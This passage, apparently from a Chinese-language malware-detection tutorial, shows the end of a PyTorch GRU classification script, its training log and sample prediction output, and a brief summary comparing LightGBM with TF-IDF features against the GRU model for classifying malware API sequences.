print(f"Validation Loss: {val_loss:.4f}, Validation Accuracy: {val_acc:.4f}")
if val_loss < best_val_loss:
best_val_loss = val_loss
torch.save(model.state_dict(), MODEL_PATH)
print(f"Model saved at {MODEL_PATH}!")

# 测试集预测
model.eval()
test_preds = []
with torch.no_grad():
for sequences in tqdm(test_loader, desc="Testing"):
sequences = sequences.to(DEVICE)
outputs = model(sequences)
preds = torch.softmax(outputs, dim=1).cpu().numpy()
test_preds.append(preds)

test_preds = np.concatenate(test_preds, axis=0)

# 创建提交文件
sub = pd.DataFrame()
sub['file_id'] = te['file_id'] # 使用测试集中的 file_id 列

# 将每个类别的预测概率填入
for i in range(NUM_CLASSES):
sub[f'prob{i}'] = test_preds[:, i]

# 保存为提交文件
sub.to_csv('pytorch_gru_submission.csv', index=False)
print("预测完成并保存至 pytorch_gru_submission.csv")

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
PS D:\chen_hao\病毒检测机器学习> & D:/ProgramSoftware/anaconda3/python.exe d:/chen_hao/病毒检测机器学习/RNN.py
Using device: cuda

Epoch 1/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:32<00:00, 1.35it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.01it/s]
Train Loss: 1.6978, Train Accuracy: 0.4272
Validation Loss: 1.5224, Validation Accuracy: 0.4460
Model saved!

Epoch 2/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:27<00:00, 1.59it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.01it/s]
Train Loss: 1.5041, Train Accuracy: 0.4547
Validation Loss: 1.5046, Validation Accuracy: 0.4471
Model saved!

Epoch 3/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:29<00:00, 1.51it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 1.4797, Train Accuracy: 0.4620
Validation Loss: 1.4927, Validation Accuracy: 0.4489
Model saved!

Epoch 4/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.56it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 1.4648, Train Accuracy: 0.4689
Validation Loss: 1.4740, Validation Accuracy: 0.4633
Model saved!

Epoch 5/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:27<00:00, 1.58it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 1.4373, Train Accuracy: 0.4820
Validation Loss: 1.4314, Validation Accuracy: 0.4924
Model saved!

Epoch 6/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:27<00:00, 1.59it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.01it/s]
Train Loss: 1.4187, Train Accuracy: 0.4918
Validation Loss: 1.3496, Validation Accuracy: 0.5169
Model saved!

Epoch 7/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.57it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 1.4115, Train Accuracy: 0.5090
Validation Loss: 1.3058, Validation Accuracy: 0.5504
Model saved!

Epoch 8/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.57it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.00it/s]
Train Loss: 1.1772, Train Accuracy: 0.6115
Validation Loss: 1.0737, Validation Accuracy: 0.6267
Model saved!

Epoch 9/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 1.0006, Train Accuracy: 0.6609
Validation Loss: 0.9820, Validation Accuracy: 0.6598
Model saved!

Epoch 10/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.9129, Train Accuracy: 0.6887
Validation Loss: 0.9084, Validation Accuracy: 0.6749
Model saved!

Epoch 11/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.8453, Train Accuracy: 0.7069
Validation Loss: 0.8542, Validation Accuracy: 0.7030
Model saved!

Epoch 12/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.7822, Train Accuracy: 0.7422
Validation Loss: 0.7674, Validation Accuracy: 0.7520
Model saved!

Epoch 13/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.7204, Train Accuracy: 0.7704
Validation Loss: 0.7360, Validation Accuracy: 0.7639
Model saved!

Epoch 14/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.7144, Train Accuracy: 0.7717
Validation Loss: 0.7184, Validation Accuracy: 0.7664
Model saved!

Epoch 15/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.02it/s]
Train Loss: 0.6625, Train Accuracy: 0.7878
Validation Loss: 0.6925, Validation Accuracy: 0.7721
Model saved!

Epoch 16/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.54it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.6390, Train Accuracy: 0.7931
Validation Loss: 0.6748, Validation Accuracy: 0.7815
Model saved!

Epoch 17/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.6061, Train Accuracy: 0.8033
Validation Loss: 0.6415, Validation Accuracy: 0.7927
Model saved!

Epoch 18/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.55it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.00it/s]
Train Loss: 0.5665, Train Accuracy: 0.8278
Validation Loss: 0.5947, Validation Accuracy: 0.8279
Model saved!

Epoch 19/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.53it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.02it/s]
Train Loss: 0.5263, Train Accuracy: 0.8396
Validation Loss: 0.5656, Validation Accuracy: 0.8287
Model saved!

Epoch 20/20
Training: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 44/44 [00:28<00:00, 1.52it/s]
Validation: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:05<00:00, 2.03it/s]
Train Loss: 0.5044, Train Accuracy: 0.8467
Validation Loss: 0.5578, Validation Accuracy: 0.8366
Model saved!
d:\chen_hao\病毒检测机器学习\RNN.py:146: FutureWarning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don't have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature.
model.load_state_dict(torch.load('best_gru_model.pth'))
Testing: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 51/51 [00:25<00:00, 2.01it/s]
预测完成并保存至 pytorch_gru_submission.csv
PS D:\chen_hao\病毒检测机器学习>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
file_id,prob0,prob1,prob2,prob3,prob4,prob5,prob6,prob7
1,0.06448878,0.002397979,0.9028775,0.0013381493,0.00045697886,0.0020659335,0.003058874,0.023315739
2,0.9813138,8.656157e-05,0.0029583538,0.0011351788,0.00028997194,0.006586187,0.0018473516,0.005782577
3,0.99163276,5.5359196e-05,0.0027402057,0.0004632939,0.000118531985,0.0013870831,0.00072588393,0.0028768326
4,0.021272896,0.011765718,0.024904,0.076123476,0.015064285,0.025066515,0.17768894,0.6481142
5,0.904939,0.00073774875,0.04147379,0.002916103,0.0005452043,0.0022994527,0.007011477,0.040077265
6,0.0021798164,0.0007873667,0.0014384006,0.0027823928,0.00244751,0.9728891,0.011387657,0.006087801
7,0.0068255765,0.017928587,0.0011721165,0.5918627,0.028887965,0.08608816,0.065764345,0.20147054
8,0.256366,0.00392755,0.17083807,0.03653748,0.0030841657,0.014288423,0.043775067,0.4711833
9,0.036793254,0.010180762,0.07269347,0.028041216,0.007907337,0.014224959,0.1945642,0.6355948
10,0.25146127,0.0009808545,0.0032455756,0.375254,0.008948095,0.1938656,0.042228147,0.124016486
11,0.00095530774,0.09089262,0.001956982,0.0021283366,0.0098222485,0.88708365,0.004995707,0.0021652123
12,0.9000948,0.00055806845,0.07364376,0.0017178208,0.00039910257,0.0030469508,0.0031312718,0.017408215
13,0.9858329,7.062489e-05,0.002319975,0.00074456446,0.00021577052,0.0051714894,0.0013318722,0.0043128696
14,0.71485704,0.0018635483,0.1835684,0.0046869554,0.00093834405,0.0039504743,0.012158039,0.07797725
15,0.95209205,0.00034266696,0.024804827,0.0013410876,0.00033840715,0.002777113,0.0031649894,0.015138777
16,0.9988642,6.826462e-05,0.0005704778,5.0490657e-05,5.821846e-05,1.5237126e-05,5.5164932e-05,0.00031797035
17,0.00090827956,0.0009387416,0.0012451294,0.00543124,0.003330927,0.96512026,0.014691722,0.008333769
18,0.01809039,0.0010136849,0.0009486259,0.55183834,0.017171165,0.17679921,0.012343813,0.22179477
19,0.9777029,0.00014269094,0.0092709325,0.0011368245,0.000268385,0.003403238,0.0015272632,0.006547669
20,0.9926167,4.7670434e-05,0.002156556,0.00042129072,0.000109387,0.0013140069,0.0006860488,0.0026483978
21,0.9420716,0.00025259246,0.010330827,0.0035953792,0.0003313114,0.013363041,0.002719807,0.027335435
22,0.010564044,0.013456773,0.013810868,0.10937901,0.023766087,0.07066154,0.2242378,0.53412384
23,0.0074043795,0.0237848,0.8829586,0.016059525,0.012664877,0.015524606,0.0027832955,0.03881999
24,0.7460677,0.0016432973,0.16402717,0.0043358603,0.0008404788,0.003432122,0.010673889,0.06897949

总结与展望

  1. 实验结论
    • 勒索病毒:设计了一个简单的勒索病毒Demo,揭示其文件加密与解密原理。
    • 机器学习:使用LightGBM结合TF-IDF特征,模型性能优秀,适合快速检测。
    • 深度学习:GRU模型对复杂API序列分类效果更优,适合进一步研究。
  2. 优化方向
    • 引入更复杂的注意力机制,加强深度学习模型对序列数据的理解。
    • 数据增强,扩展训练数据多样性,提升模型泛化能力。
    • 结合机器学习和深度学习结果进行模型融合,进一步提升检测与分类性能。